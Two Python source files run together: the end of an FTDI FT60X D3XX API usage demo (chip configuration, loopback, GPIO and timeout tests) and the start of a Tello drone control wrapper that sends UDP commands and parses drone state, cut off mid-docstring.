_ft.FT_CONFIGURATION_FIFO_CLK_100 # cfg.FIFOClock = _ft.FT_CONFIGURATION_FIFO_CLK_66 # cfg.FIFOClock = _ft.FT_CONFIGURATION_FIFO_CLK_50 # cfg.FIFOClock = _ft.FT_CONFIGURATION_FIFO_CLK_40 cfg.FIFOMode = _ft.FT_CONFIGURATION_FIFO_MODE_245 cfg.ChannelConfig = _ft.FT_CONFIGURATION_CHANNEL_CONFIG_1 cfg.OptionalFeatureSupport = 0x03c2 cfg.BatteryChargingGPIOConfig = 0xe4 cfg.MSIO_Control = 0x00010800 D3XX.setChipConfiguration(cfg) D3XX.close(True) D3XX = 0 # wait until device has reenumerated DemoWaitForDeviceReenumeration() # reopen to display chip configuration if bDisplay == True: if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False cfg = D3XX.getChipConfiguration() DisplayChipConfiguration(cfg) D3XX.close() D3XX = 0 return True def DemoModifyChipConfiguration(): if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # get and display current chip configuration logging.debug("get and modify current chip configuration") cfg = D3XX.getChipConfiguration() DisplayChipConfiguration(cfg) # modify chip configuration Manufacturer = "ManufacturerMod" ProductDescription = "ProductDescriptionMod" SerialNumber = "SerialNumberMod" newCfg = cfg SetInfoForStringDescriptor(newCfg, Manufacturer, ProductDescription, SerialNumber) D3XX.setChipConfiguration(newCfg) D3XX.close(True) D3XX = 0 # wait until device has reenumerated DemoWaitForDeviceReenumeration() # reopen to display current chip configuration logging.debug("get new chip configuration") if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False readCfg = D3XX.getChipConfiguration() DisplayChipConfiguration(readCfg) STRDESC = GetInfoFromStringDescriptor(readCfg.StringDescriptors) D3XX.close() D3XX = 0 return True def DemoSetChipConfiguration(): if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # set chip configuration without using getChipConfiguration() logging.debug("set chip configuration without using getChipConfiguration") cfg = _ft.FT_60XCONFIGURATION() Manufacturer = "ManufacturerSet" ProductDescription = "ProductDescriptionSet" SerialNumber = "SerialNumberSet" SetInfoForStringDescriptor(cfg, Manufacturer, ProductDescription, SerialNumber) cfg.VendorID = _ft.FT_CONFIGURATION_DEFAULT_VENDORID cfg.ProductID = _ft.FT_CONFIGURATION_DEFAULT_PRODUCTID_601 cfg.bInterval = _ft.FT_CONFIGURATION_DEFAULT_INTERRUPT_INTERVAL cfg.PowerAttributes = _ft.FT_CONFIGURATION_DEFAULT_POWERATTRIBUTES cfg.PowerConsumption = _ft.FT_CONFIGURATION_DEFAULT_POWERCONSUMPTION cfg.Reserved2 = 0 cfg.FIFOClock = _ft.FT_CONFIGURATION_DEFAULT_FIFOCLOCK cfg.FIFOMode = _ft.FT_CONFIGURATION_DEFAULT_FIFOMODE cfg.ChannelConfig = _ft.FT_CONFIGURATION_DEFAULT_CHANNELCONFIG cfg.OptionalFeatureSupport = _ft.FT_CONFIGURATION_DEFAULT_OPTIONALFEATURE cfg.BatteryChargingGPIOConfig = _ft.FT_CONFIGURATION_DEFAULT_BATTERYCHARGING cfg.FlashEEPROMDetection = _ft.FT_CONFIGURATION_DEFAULT_FLASHDETECTION cfg.MSIO_Control = _ft.FT_CONFIGURATION_DEFAULT_MSIOCONTROL cfg.GPIO_Control = _ft.FT_CONFIGURATION_DEFAULT_GPIOCONTROL DisplayChipConfiguration(cfg) D3XX.setChipConfiguration(cfg) D3XX.close(True) D3XX = 0 # wait until device has reenumerated DemoWaitForDeviceReenumeration() # reopen to display current chip configuration logging.debug("get new chip configuration") if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False readCfg = D3XX.getChipConfiguration() DisplayChipConfiguration(readCfg) D3XX.close() D3XX = 0 return True def DemoChipConfiguration(): # result = DemoGetChipConfiguration() # if result == True: # result = DemoSetChipConfiguration() # if result == True: # result = DemoResetChipConfiguration() # if result == True: # result = DemoGetChipConfiguration() # if result == True: # result = DemoModifyChipConfiguration() # if result == True: result = DemoResetChipConfiguration() # if result == True: # result = DemoGetChipConfiguration() return result def DemoTransfer(): if sys.platform == 'win32': # abort transfer test result = DemoAbortTransfer() # loopback in streaming and non-streaming mode if result == True: result = DemoLoopback(True) if result == True: result = DemoLoopback(False) elif sys.platform == 'linux': result = DemoLoopback() return result def DemoLoopback(bStreamingMode=False): result = True channel = 0 if sys.platform == 'linux': epout = channel epin = channel else: epout = 0x02 + channel epin = 0x82 + channel size = 4096 logging.debug("Write/read synchronous loopback of string") D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # enable streaming mode if bStreamingMode and sys.platform == 'linux': D3XX.setStreamPipe(epout, size) D3XX.setStreamPipe(epin, size) # if python 2.7.12 if sys.version_info.major == 2: for x in range(0, 10): buffwrite = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size)) bytesWritten = D3XX.writePipe(epout, buffwrite, size) bytesRead = 0 buffread = "" while (bytesRead < bytesWritten): output = D3XX.readPipeEx(epin, bytesWritten - bytesRead) bytesRead += output['bytesTransferred'] buffread += output['bytes'] # compare data compare = True if (buffread[:bytesRead] != buffwrite[:bytesWritten]): compare = False logging.debug("[%d] writePipe [%d] bytes, readPipe [%d] bytes, compare = %s" % (x, bytesWritten, bytesRead, compare)) if compare == False: result = False break # elif python 3.5.2 # version 3 does not support implicit bytes to string conversion elif sys.version_info.major == 3: # flush old crap out first D3XX.readPipeEx(epin, size, raw=True, timeout=0) for x in range(0, 10): buffwrite = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size)) # text4k = '0123456789ABCDEF' * (4096 // 16) # buffwrite = ('<START %02d>' % x) + text4k[:-29] + '<qwerty_END_asdfgh>' # buffwrite = (chr(ord('A') + x) * 10) + text4k[:-20] + (chr(ord('a') + x) * 10) # buffwrite = (chr(ord('A') + x) * 10) + text4k[:-20] + (chr(ord('a') + x) * 10) buffwrite = buffwrite.encode('latin1') bytesWritten = D3XX.writePipe(epout, buffwrite, size) bytesRead = 0 buffread = bytes() while (bytesRead < bytesWritten): output = D3XX.readPipeEx(epin, bytesWritten - bytesRead, raw=True, timeout=0) bytesRead += output['bytesTransferred'] buffread += output['bytes'] # compare data compare = True logging.debug(buffwrite[:bytesWritten]) logging.debug(buffread[:bytesRead]) if (buffread[:bytesRead] != buffwrite[:bytesWritten]): compare = False logging.debug("[%d] writePipe [%d] bytes, readPipe [%d] bytes, compare = %s" % (x, bytesWritten, bytesRead, compare)) if compare == False: result = False break # disable streaming mode if bStreamingMode and sys.platform == 'linux': D3XX.clearStreamPipe(epout) D3XX.clearStreamPipe(epin) D3XX.close() D3XX = 0 logging.debug("") return result def DemoAbortThread(arg): logging.debug("DemoAbortThread\n") time.sleep(1) logging.debug("abortPipe") arg.abortPipe(0x82) return True def DemoAbortTransfer(): logging.debug("Abort transfer") D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False thread = threading.Thread(target = DemoAbortThread, args = (D3XX, )) thread.start() # readpipe is blocking when overlapped parameter is not set # it will be unblocked by the thread DemoAbortThread logging.debug("readPipe") D3XX.setPipeTimeout(0x82, 0) D3XX.readPipeEx(0x82, 1024) thread.join() D3XX.close() D3XX = 0 logging.debug("") return True def EnableNotificationFeature(bEnable): D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # get and display current chip configuration cfg = D3XX.getChipConfiguration() #DisplayChipConfiguration(cfg) # enable or disable notification for 1st channel if bEnable: cfg.OptionalFeatureSupport |= _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH1; cfg.Interval = _ft.FT_CONFIGURATION_DEFAULT_INTERRUPT_INTERVAL; else: cfg.OptionalFeatureSupport &= ~_ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH1; #DisplayChipConfiguration(cfg) D3XX.setChipConfiguration(cfg) D3XX.close() D3XX = 0 # wait until device has reenumerated DemoWaitForDeviceReenumeration() # display the chip configuration D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False cfg = D3XX.getChipConfiguration() DisplayChipConfiguration(cfg) D3XX.close() D3XX = 0 if bEnable and not (cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH1): return False return True def DemoNotificationTransfer(): logging.debug("enable notification feature on channel 1") EnableNotificationFeature(True) D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.setSuspendTimeout(0) logging.debug("Set notification event") eventCondition = threading.Event() eventCondition.ulRecvNotificationLength = int(0x0) eventCondition.ucEndpointNo = int(0x0) D3XX.setNotificationCallback(eventCondition) buffwrite = bytearray(4096) logging.debug("writePipe %d" % len(buffwrite)) buffwrite[:] = itertools.repeat(0xAA, len(buffwrite)) #print binascii.hexlify(buffwrite) bytesWritten = D3XX.writePipe(0x02, str(buffwrite), len(buffwrite)) bytesRead = 0 while (bytesRead < bytesWritten): while not eventCondition.is_set(): eventCondition.wait(1) ulRecvNotificationLength = eventCondition.ulRecvNotificationLength ucEndpointNo = eventCondition.ucEndpointNo #print "ulRecvNotificationLength %d ucEndpointNo %d" % (ulRecvNotificationLength, ucEndpointNo) #readOutput = D3XX.readPipe(ucEndpointNo, ulRecvNotificationLength) readOutput = D3XX.readPipe(0x82, 512) bytesRead += readOutput['bytesTransferred'] logging.debug("readPipe %d" % bytesRead) buffread = readOutput['bytes'] logging.debug("clearNotificationCallback") D3XX.clearNotificationCallback() D3XX.close() D3XX = 0 logging.debug("") logging.debug("disable notification feature on channel 1") EnableNotificationFeature(False) return True def DemoPipeTimeout(): if sys.platform == 'linux': return True logging.debug("Get set pipe timeout") D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False pipe = 0x02 # get timeout for pipe 0x02 timeoutMS = D3XX.getPipeTimeout(pipe) logging.debug("default timeout = %d" % timeoutMS) # set desired timeout for pipe 0x02 D3XX.setPipeTimeout(pipe, timeoutMS*2) logging.debug("set timeout = %d" % (timeoutMS*2)) # verify if timeout changed timeoutMSNew = D3XX.getPipeTimeout(pipe) logging.debug("new timeout = %d" % timeoutMSNew) if (timeoutMSNew != timeoutMS*2): return False # revert to original timeout D3XX.setPipeTimeout(pipe, timeoutMS) logging.debug("revert timeout = %d" % timeoutMS) D3XX.close() D3XX = 0 return True def DemoSuspendTimeout(): if sys.platform == 'linux': return True logging.debug("Get set suspend timeout") D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # get current timeout timeout = D3XX.getSuspendTimeout() logging.debug("default timeout = %d" % timeout) # set the desired timeout D3XX.setSuspendTimeout(timeout*2) logging.debug("set timeout = %d" % (timeout*2)) # verify if timeout changed timeoutNew = D3XX.getSuspendTimeout() logging.debug("new timeout = %d" % timeoutNew) if (timeoutNew != timeout*2): return False # revert to original timeout D3XX.setSuspendTimeout(timeout) logging.debug("revert timeout = %d" % timeout) D3XX.close() D3XX = 0 return True def DemoCyclePort(): # reset device port logging.debug("Reset device port") D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.resetDevicePort() D3XX.close() D3XX = 0 # wait until device has reenumerated DemoWaitForDeviceReenumeration() if sys.platform == 'win32': # cycle device port logging.debug("Cycle device port") D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.cycleDevicePort() D3XX.close() D3XX = 0 # wait until device has reenumerated DemoWaitForDeviceReenumeration() return True def EnableBatteryChargingDetectionFeature(bEnable): D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # get and display current chip configuration cfg = D3XX.getChipConfiguration() #DisplayChipConfiguration(cfg) # enable or disable battery charging detection # BatteryChargingGPIOConfig Default setting : 11100100b (0xE4 - FT_CONFIGURATION_DEFAULT_BATTERYCHARGING) # 7 - 6 : DCP = 11b (GPIO1 = 1 GPIO0 = 1) # 5 - 4 : CDP = 10b (GPIO1 = 1 GPIO0 = 0) # 3 - 2 : SDP = 01b (GPIO1 = 0 GPIO0 = 1) # 1 - 0 : Unknown/Off = 00b (GPIO1 = 0 GPIO0 = 0) if bEnable: cfg.OptionalFeatureSupport |= _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLEBATTERYCHARGING cfg.BatteryChargingGPIOConfig |= _ft.FT_CONFIGURATION_DEFAULT_BATTERYCHARGING else: cfg.OptionalFeatureSupport &= ~_ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLEBATTERYCHARGING #DisplayChipConfiguration(cfg) D3XX.setChipConfiguration(cfg) D3XX.close() D3XX = 0 # wait until device has reenumerated DemoWaitForDeviceReenumeration() # verify the chip configuration D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False cfg = D3XX.getChipConfiguration() DisplayChipConfiguration(cfg) D3XX.close() D3XX = 0 if bEnable and not (cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLEBATTERYCHARGING): return False return True def DemoGpioBatteryCharging(): logging.debug("enable battery charging detection feature") EnableBatteryChargingDetectionFeature(True) D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False mask = _ft.FT_GPIO_MASK_GPIO_0 | _ft.FT_GPIO_MASK_GPIO_1 # enable gpio by setting gpio direction direction = (_ft.FT_GPIO_DIRECTION_OUT << _ft.FT_GPIO_0) | (_ft.FT_GPIO_DIRECTION_OUT << _ft.FT_GPIO_1) D3XX.enableGPIO(mask, direction) # read gpio # BatteryChargingGPIOConfig Default setting : 11100100b (0xE4) # 7 - 6 : DCP = 11b (GPIO1 = 1 GPIO0 = 1) # 5 - 4 : CDP = 10b (GPIO1 = 1 GPIO0 = 0) # 3 - 2 : SDP = 01b (GPIO1 = 0 GPIO0 = 1) # 1 - 0 : Unknown/Off = 00b (GPIO1 = 0 GPIO0 = 0) # Since device is connected to a host machine, then we should get SDP (GPIO1 = 0 GPIO0 = 1) bcdtype = ['UNKNOWN', 'SDP - Standard Downstream Port', 'CDP - Charging Downstream Port', 'DCP - Dedicated Charging Port'] data = D3XX.readGPIO() logging.debug("detected battery charging type: [%s]" % bcdtype[data]) logging.debug("") D3XX.close() D3XX = 0 logging.debug("disable battery charging detection feature") EnableBatteryChargingDetectionFeature(False) return True def DemoGpioSetGet(): if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False mask = _ft.FT_GPIO_MASK_GPIO_0 | _ft.FT_GPIO_MASK_GPIO_1 # enable gpio by setting gpio direction direction = (_ft.FT_GPIO_DIRECTION_OUT << _ft.FT_GPIO_0) | (_ft.FT_GPIO_DIRECTION_OUT << _ft.FT_GPIO_1) D3XX.enableGPIO(mask, direction) logging.debug("enable gpio[gpio0: %d, gpio1: %d]" % (direction & _ft.FT_GPIO_MASK_GPIO_0, (direction & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1)) # set gpio pull both high pull = (_ft.FT_GPIO_PULL_HIGH << _ft.FT_GPIO_0) | (_ft.FT_GPIO_PULL_HIGH << _ft.FT_GPIO_1) D3XX.setGPIOPull(mask, pull) logging.debug("pull gpio [gpio0: %d, gpio1: %d]" % (pull & _ft.FT_GPIO_MASK_GPIO_0, (pull & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1)) # read gpio data = D3XX.readGPIO() logging.debug("read gpio [gpio0: %d, gpio1: %d]" % (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1)) # write gpio both low data = (_ft.FT_GPIO_VALUE_LOW << _ft.FT_GPIO_0) | (_ft.FT_GPIO_VALUE_LOW << _ft.FT_GPIO_1) D3XX.writeGPIO(mask, data) logging.debug("write gpio [gpio0: %d, gpio1: %d]" % (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1)) # read gpio data = D3XX.readGPIO() logging.debug("read gpio [gpio0: %d, gpio1: %d]" % (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1)) # write gpio both high data = (_ft.FT_GPIO_VALUE_HIGH << _ft.FT_GPIO_0) | (_ft.FT_GPIO_VALUE_HIGH << _ft.FT_GPIO_1) D3XX.writeGPIO(mask, data) logging.debug("write gpio [gpio0: %d, gpio1: %d]" % (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1)) # read gpio data = D3XX.readGPIO() logging.debug("read gpio [gpio0: %d, gpio1: %d]" % (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1)) D3XX.close() D3XX = 0 logging.debug("") return True def DemoGpio(): result = DemoGpioSetGet() if sys.platform == 'win32': if result == True: result = DemoGpioBatteryCharging() return result def GetOSVersion(): if (sys.platform == 'win32'): verList = [("Windows 7", 6, 1), ("Windows 8", 6, 2), ("Windows 8.1", 6, 3), ("Windows 10", 10, 0)] ver = sys.getwindowsversion() elemList = [elem for index, elem in enumerate(verList) if ver.major == elem[1] and ver.minor == elem[2]] return elemList[0][0] if len(elemList) == 1 else os.getenv("OS") return os.uname()[0] def GetOSArchitecture(): if (sys.platform == 'win32'): return os.environ["PROCESSOR_ARCHITECTURE"] return platform.machine() def GetComputername(): if (sys.platform == 'win32'): return os.getenv('COMPUTERNAME') return platform.node() def GetUsername(): if (sys.platform == 'win32'): return os.getenv('USERNAME') import pwd return pwd.getpwuid(os.getuid())[0] def main(): # check connected devices numDevices = DemoGetNumDevicesConnected() if (numDevices != 1): logging.debug("ERROR: Please check environment setup! %d device(s) detected." % numDevices) return False # list the test cases testCases = [ # (DemoEnumerateDevices, "DemoEnumerateDevices"), # (DemoOpenDeviceBy, "DemoOpenDeviceBy"), # (DemoVersions, "DemoVersions"), # (DemoDescriptors, "DemoDescriptors"), (DemoChipConfiguration, "DemoChipConfiguration"), (DemoTransfer, "DemoTransfer"), # (DemoPipeTimeout, "DemoPipeTimeout"), # (DemoSuspendTimeout, "DemoSuspendTimeout"), # (DemoCyclePort, "DemoCyclePort"), # (DemoGpio, "DemoGpio"), ] # execute the test cases fails = success = 0 for test in testCases: logging.debug("--------------------------------------------------------------") logging.debug("%s" % test[1]) logging.debug("--------------------------------------------------------------") start = datetime.datetime.now() logging.debug("Start time,%s" % start) logging.debug("") result = test[0]() stop = datetime.datetime.now() logging.debug("") logging.debug("Stop time,%s" % stop) if result == True: logging.debug("Status,SUCCESS") success += 1 else: logging.debug("Status,FAILED") fails += 1 logging.debug("") logging.debug("") # display summary count logging.debug("--------------------------------------------------------------") logging.debug("Summary") logging.debug("--------------------------------------------------------------") logging.debug("Summary Log Counts,[ Fails (%d); Success (%d) ]" % (fails, success)) logging.debug("") logging.debug("") if sys.platform == 'win32': DemoResetChipConfiguration(False) return fails == 0 if __name__ == "__main__": # initialize logging to log in both console and file logging.basicConfig(filename='apiusage.log', filemode='w', level=logging.DEBUG, format='[%(asctime)s] %(message)s') logging.getLogger().addHandler(logging.StreamHandler()) logging.debug("") logging.debug("**************************************************************") logging.debug("FT60X D3XX PYTHON API USAGE DEMO") logging.debug("WORKSTATION,%s" % GetComputername()) logging.debug("OSVERSION,%s,%s" % (GetOSVersion(), GetOSArchitecture())) logging.debug("OPERATOR,%s" % GetUsername()) logging.debug("DATE,%s" % datetime.datetime.now().strftime("%Y-%m-%d")) logging.debug("TIME,%s" % datetime.datetime.now().strftime("%H:%M:%S")) logging.debug("PYTHON,%d.%d.%d" % (sys.version_info.major, sys.version_info.minor, sys.version_info.micro)) logging.debug("**************************************************************") logging.debug("") logging.debug("") logging.debug("") logging.debug("") main()
tello_module.py
# coding=utf-8 import logging import socket import time import threading import cv2 from threading import Thread drones = None client_socket = None class Tello: """Python wrapper to interact with the Ryze Tello drone using the official Tello api. Tello API documentation: https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf """ # Send and receive commands, client socket RESPONSE_TIMEOUT = 7 # in seconds TIME_BTW_COMMANDS = 1 # in seconds TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds RETRY_COUNT = 3 last_received_command = time.time() HANDLER = logging.StreamHandler() FORMATTER = logging.Formatter('%(filename)s - %(lineno)d - %(message)s') HANDLER.setFormatter(FORMATTER) LOGGER = logging.getLogger('djitellopy') LOGGER.addHandler(HANDLER) LOGGER.setLevel(logging.INFO) # use logging.getLogger('djitellopy').setLevel(logging.<LEVEL>) in YOUR CODE # to only receive logs of the desired level and higher # Video stream, server socket VS_UDP_IP = '0.0.0.0' VS_UDP_PORT = 11111 CONTROL_UDP_PORT = 8889 STATE_UDP_PORT = 8890 # conversion functions for state protocol fields state_field_converters = { # Tello EDU with mission pads enabled only 'mid': int, 'x': int, 'y': int, 'z': int, # 'mpry': (custom format 'x,y,z') # common entries 'pitch': int, 'roll': int, 'yaw': int, 'vgx': int, 'vgy': int, 'vgz': int, 'templ': int, 'temph': int, 'tof': int, 'h': int, 'bat': int, 'baro': float, 'time': int, 'agx': float, 'agy': float, 'agz': float, } # VideoCapture object cap = None background_frame_read = None stream_on = False is_flying = False def __init__(self, host='192.168.10.1', retry_count=3): global drones self.address = (host, Tello.CONTROL_UDP_PORT) self.stream_on = False self.retry_count = retry_count if drones is None: drones = {} # Run tello udp receiver on background thread1 = threading.Thread( target=Tello.udp_response_receiver, args=()) # Run state reciever on background thread2 = threading.Thread( target=Tello.udp_state_receiver, args=()) thread1.daemon = True thread2.daemon = True thread1.start() thread2.start() drones[host] = { 'responses': [], 'state': {}, } def get_own_udp_object(self): global drones host = self.address[0] return drones[host] @staticmethod def udp_response_receiver(): """Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread in order to not block the main thread.""" global client_socket client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) client_socket.bind(('', Tello.CONTROL_UDP_PORT)) while True: try: data, address = client_socket.recvfrom(1024) address = address[0] if address not in drones: continue drones[address]['responses'].append(data) except Exception as e: Tello.LOGGER.error(e) break @staticmethod def udp_state_receiver(): """Setup state UDP receiver. This method listens for state infor from the Tello. Must be run from a background thread in order to not block the main thread.""" state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) state_socket.bind(('', Tello.STATE_UDP_PORT)) while True: try: data, address = state_socket.recvfrom(1024) address = address[0] if address not in drones: continue drones[address]['state'] = Tello.parse_state(data) except Exception as e: Tello.LOGGER.error(e) break @staticmethod def parse_state(state: str) -> dict: """Parse a state line to a dict""" state = state.decode('ASCII').strip() if state == 'ok': return {} state_obj = {} for field in state.split(';'): split = field.split(':') if len(split) < 2: continue key = split[0] value = split[1] if key in Tello.state_field_converters: try: value = Tello.state_field_converters[key](value) except Exception as e: Tello.LOGGER.error(e) state_obj[key] = value return state_obj def get_current_state(self) -> dict: """Call this function to attain the state of the Tello. Returns a dict with all fields""" return self.get_own_udp_object()['state'] def get_state_field(self, key: str) -> any: state = self.get_current_state() if key in state: return state[key] else: raise Exception('Could not get state property ' + key) def get_mission_pad_id(self) -> int: """Mission pad ID of the currently detected mission pad Only available on Tello EDUs after calling enable_mission_pads Returns: int: -1 if none is detected, else 1-8 """ return self.get_state_field('mid') def get_mission_pad_distance_x(self) -> int: """X distance to current mission pad Only available on Tello EDUs after calling enable_mission_pads Returns: int: distance in cm """ return self.get_state_field('x') def get_mission_pad_distance_y(self) -> int: """Y distance to current mission pad Only available on Tello EDUs after calling enable_mission_pads Returns: int: distance in cm """ return self.get_state_field('y') def get_mission_pad_distance_z(self) -> int: """Z distance to current mission pad Only available on Tello EDUs after calling enable_mission_pads Returns: int: distance in cm """ return self.get_state_field('z') def get_pitch(self) -> int: """Get pitch in degree Returns: int: pitch in degree """ return self.get_state_field('pitch') def get_roll(self) -> int: """Get roll in degree Returns: int: roll in degree """ return self.get_state_field('roll') def get_yaw(self) -> int: """Get yaw in degree Returns: int: yaw in degree """ return self.get_state_field('yaw') def get_speed_x(self) -> int: """X-Axis Speed Returns: int: speed """ return self.get_state_field('vgx') def get_speed_y(self) -> int: """Y-Axis Speed Returns: int: speed """ return self.get_state_field('vgy') def get_speed_z(self) -> int: """Z-Axis Speed Returns: int: speed """ return self.get_state_field('vgz') def get_acceleration_x(self) -> float: """X-Axis Acceleration Returns: float: acceleration """ return self.get_state_field('agx') def get_acceleration_y(self) -> float: """Y-Axis Acceleration Returns: float: acceleration """ return self.get_state_field('agy') def get_acceleration_z(self) -> float: """Z-Axis Acceleration Returns: float: acceleration """ return self.get_state_field('agz') def get_height(self) -> int: """Get current height in cm Returns: int: height in cm """ return self.get_state_field('h') def get_battery(self) -> int: """Get current battery percentage Returns: False: Unsuccessful int: 0-100 """ return self.get_state_field('bat') def get_udp_video_address(self) -> str: # + '?overrun_nonfatal=1&fifo_size=5000' return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) def get_video_capture(self): """Get the VideoCapture object from the camera drone Returns: VideoCapture """ if self.cap is None: self.cap = cv2.VideoCapture(self.get_udp_video_address()) if not self.cap.isOpened(): self.cap.open(self.get_udp_video_address()) return self.cap def get_frame_read(self) -> 'BackgroundFrameRead': """Get the BackgroundFrameRead object from the camera drone. Then, you just need to call backgroundFrameRead.frame to get the actual frame received by the drone. Returns: BackgroundFrameRead """ if self.background_frame_read is None: self.background_frame_read = BackgroundFrameRead( self, self.get_udp_video_address()).start() return self.background_frame_read def stop_video_capture(self): return self.streamoff() def send_command_with_return(self, command: str, printinfo: bool = True, timeout: int = RESPONSE_TIMEOUT) -> str: """Send command to Tello and wait for its response. Return: bool: True for successful, False for unsuccessful """ # Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds diff = time.time() * 1000 - self.last_received_command if diff < self.TIME_BTW_COMMANDS: time.sleep(diff) if printinfo: self.LOGGER.info('Send command: ' + command) timestamp = int(time.time() * 1000) client_socket.sendto(command.encode('utf-8'), self.address) responses = self.get_own_udp_object()['responses'] while len(responses) == 0: if (time.time() * 1000) - timestamp > self.RESPONSE_TIMEOUT * 1000: self.LOGGER.warning('Timeout exceed on command ' + command) return False else: time.sleep(0.1) response = responses.pop(0) response = response.decode('utf-8').rstrip("\r\n") if printinfo: self.LOGGER.info('Response {}: {}'.format(command, response)) self.response = None self.last_received_command = time.time() * 1000 return response def send_command_without_return(self, command: str): """Send command to Tello without expecting a response. Use this method when you want to send a command continuously - go x y z speed: Tello fly to x y z in speed (cm/s) x: 20-500 y: 20-500 z: 20-500 speed: 10-100 - curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responses false. x/y/z can’t be between -20 – 20 at the same time . x1, x2: 20-500 y1, y2: 20-500 z1, z2: 20-500 speed: 10-60 - rc a b c d: Send RC control via four channels. a: left/right (-100~100) b: forward/backward (-100~100) c: up/down (-100~100) d: yaw (-100~100) """ # Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds self.LOGGER.info('Send command (no expect response): ' + command) client_socket.sendto(command.encode('utf-8'), self.address) def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str: """Send control command to Tello and wait for its response. Possible control commands: - command: entry SDK mode - takeoff: Tello auto takeoff - land: Tello auto land - streamon: Set video stream on - streamoff: Set video stream off - emergency: Stop all motors immediately - up x: Tello fly up with distance x cm. x: 20-500 - down x: Tello fly down with distance x cm. x: 20-500 - left x: Tello fly left with distance x cm. x: 20-500 - right x: Tello fly right with distance x cm. x: 20-500 - forward x: Tello fly forward with distance x cm. x: 20-500 - back x: Tello fly back with distance x cm. x: 20-500 - cw x: Tello rotate x degree clockwise x: 1-3600 - ccw x: Tello rotate x degree counter- clockwise. x: 1-3600 - flip x: Tello fly flip x l (left) r (right) f (forward) b (back) - speed x: set speed to x cm/s. x: 10-100 - wifi ssid pass: Set 